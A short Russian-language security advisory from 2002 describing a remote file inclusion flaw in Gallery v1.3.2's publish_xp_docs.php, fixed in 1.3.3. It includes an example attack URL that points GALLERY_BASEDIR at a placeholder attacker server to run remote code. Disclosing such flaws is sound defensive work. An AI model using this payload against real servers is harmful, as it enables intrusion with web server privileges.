Security Lab

Выполнение произвольных команд в Gallery

Дата публикации:30.12.2002
Всего просмотров:888
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Gallery – система управления изображениями от http://gallery.sourceforge.net.

Gallery v1.3.2 содержит новую особенность, которая позволяет пользователям публиковать изображения Web сайте, используя систему публикации Windows XP Publishing subsystem. Обнаруженная уязвимость в этой особенности (а точнее в сценарии publish_xp_docs.php) позволяет злонамеренному пользователю обработать URL таким образом, что он может получить удаленный доступ к Web серверу с привилегиями Web сервера.

Пример:

http://hostname/gallery/publish_xp_docs.php?
GALLERY_BASEDIR=http://your.evil.server.tdl/
Уязвимость обнаружена в 1.3.2
Ссылки: Gallery v1.3.2 allows remote exploit (fixed in 1.3.3)